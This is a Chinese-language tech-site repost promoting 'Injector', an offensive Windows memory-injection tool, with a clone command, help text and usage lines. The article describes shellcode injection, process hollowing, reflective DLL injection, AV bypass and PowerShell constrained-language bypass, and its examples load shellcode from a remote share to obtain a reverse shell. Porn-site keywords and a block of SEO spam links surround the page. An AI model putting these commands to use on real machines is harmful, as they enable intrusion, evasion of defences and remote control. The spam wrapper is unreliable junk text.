成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何使用Injector實現(xiàn)Windows下的內(nèi)存注入

安全 網(wǎng)站安全
Injector是一款功能齊全且強大的內(nèi)存注入工具,該工具集成了多種技術(shù),可以幫助紅隊研究人員實現(xiàn)在Windows系統(tǒng)下的內(nèi)存注入。

[[423411]]

關(guān)于Injector

Injector是一款功能齊全且強大的內(nèi)存注入工具,該工具集成了多種技術(shù),可以幫助紅隊研究人員實現(xiàn)在Windows系統(tǒng)下的內(nèi)存注入。

Injector能做什么?

針對遠(yuǎn)程服務(wù)器和本地存儲提供Shellcode注入支持。只需指定Shellcode文件,該工具將幫助我們完成后續(xù)的所有事情。默認(rèn)情況下,工具會將Shellcode注入至exe,如果沒有找到目標(biāo)進(jìn)程,它將會創(chuàng)建一個記事本進(jìn)程,并注入其中實現(xiàn)持久化感染。

  • 支持反射DLL注入,工具將下載DLL并注入遠(yuǎn)程進(jìn)程。
  • 通過exe實現(xiàn)進(jìn)程鏤空。
  • 使用-bypass參數(shù),以支持使用更高級的、未記錄的API來進(jìn)行進(jìn)程注入。
  • 支持加密的Shellcode,比如說AES加密或異或加密等。
  • 支持針對PowerShell的CLM繞過,可以直接將代碼存防止能夠執(zhí)行C#代碼的白名單文件夾中,比如說“C:\Windows\Tasks”。
  • 支持DLL鏤空,通過dll實現(xiàn)。

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/0xDivyanshu/Injector.git 

工具幫助

  1. C:\Users\admin>Injector.exe 
  2.  
  3. Help Options for Xenon: 
  4.  
  5. -m       Mode of operation 
  6.  
  7.         -m 1     Specifies the mode as Process injection 
  8.  
  9.         -m 2     Specifies the mode as Reflective DLL Injection 
  10.  
  11.         -m 3     Specifies the mode as Process Hollowing 
  12.  
  13.         -m 4     No injection! Give me my damn shell 
  14.  
  15.         -m 5     Powershell session via CLM bypass 
  16.  
  17.         -m 6     DLL hollowing 
  18.  
  19.   
  20.  
  21. -TempFile        File location that your current user can read 
  22.  
  23. -shellcode       Use shellcode 
  24.  
  25. -dll     Use dll 
  26.  
  27. -decrypt-xor     Specify Xor decryption for shellcode 
  28.  
  29.          -pass   Specifty the password for Xor decryption 
  30.  
  31. -decrypt-aes     Specify aes decryption for shellcode 
  32.  
  33.          -pass   Specifty the password for aes decryption 
  34.  
  35. -location        Specify the location i.e either server or local 
  36.  
  37. -bypass         Uses enhance attempts to bypass AV 

如需生成加密的Shellcode,請在Kali下使用Helper.exe。

工具使用樣例

  1. Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass 

上述命令將解密你的Shellcode并給你一個反向Shell。

如果你不想使用加密的Shellcode,你也可以直接使用下列命令運行下列命令:

  1. Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt" 

將其中的“-m=1”修改為“2,3,4,6”之后,就可以運行其他模式了:

  1. Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt 

上述命令將提供要給會話,我們可以使用它來執(zhí)行IEX cradle,并獲取一個能夠繞過CLM的反向Shell。

PowerShell

你還可以使用Invoke-Exe.ps1來通過PowerShel執(zhí)行Injector:

  1. Invoke-Exe -loc C:\Users\john\injector.exe 

項目地址

Injector:【GitHub傳送門

 

責(zé)任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2021-09-13 18:09:35

cThreadHija遠(yuǎn)程進(jìn)程注入網(wǎng)絡(luò)攻擊

2010-04-08 15:37:33

2021-07-28 09:53:53

FalconEye注入安全檢測

2025-04-01 00:33:03

LangGraphPython內(nèi)存

2017-08-16 16:00:05

PHPcontainer依賴注入

2014-03-04 09:53:29

Redis存儲系統(tǒng)

2010-06-04 14:12:57

Hadoop開發(fā)環(huán)境

2009-09-09 13:47:38

C++訪問SqlCe

2010-09-27 15:03:34

TomcatJVM內(nèi)存設(shè)置

2020-11-25 08:41:56

Windows

2009-04-11 15:12:24

Windows CE串行通信GPS

2017-04-13 13:00:27

LinuxWindowstomcat

2010-05-26 15:07:36

SVN版本庫自動備份

2018-07-24 09:57:02

2011-09-05 14:17:07

UbuntuWindows鍵

2010-06-07 09:47:34

php sendmai

2012-09-28 13:39:40

Windows備份

2022-09-01 13:12:53

LinuxTC網(wǎng)絡(luò)限流

2009-07-16 15:02:39

Windows CE平臺類型

2011-08-08 16:49:07

自動關(guān)機SwitchOffWindows
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 羞羞的视频免费在线观看 | 天天操操| 国产精品一区二区福利视频 | 日韩欧美在线视频 | 一区二区在线不卡 | 久草久 | 午夜精品久久久久久久久久久久 | 国产精品国产精品国产专区不卡 | 欧美激情国产日韩精品一区18 | 色综合一区二区 | 亚洲精品日韩精品 | 欧美精品福利 | 亚洲黄色av | 久草视频在线播放 | 国产精品久久久久久亚洲调教 | 成人免费视频观看视频 | 日韩中文一区二区三区 | 久久精品国产一区二区电影 | 欧美视频免费 | 可以免费观看的av | 狠狠的操| 精品国产乱码久久久久久丨区2区 | 亚洲国产精品99久久久久久久久 | 天天曰天天曰 | 国产精品一区在线观看 | 九九久久久 | 日产精品久久久一区二区福利 | 超碰日韩 | 久久国产欧美一区二区三区精品 | 青青草原综合久久大伊人精品 | www网站在线观看 | 中文字幕一区二区不卡 | 午夜伦4480yy私人影院 | 四季久久免费一区二区三区四区 | 日韩一区二区福利 | 国产精品免费一区二区三区四区 | 亚洲欧洲精品成人久久奇米网 | 欧美成人免费 | 亚洲一区免费 | 免费久久精品视频 | 一区二区三区四区视频 |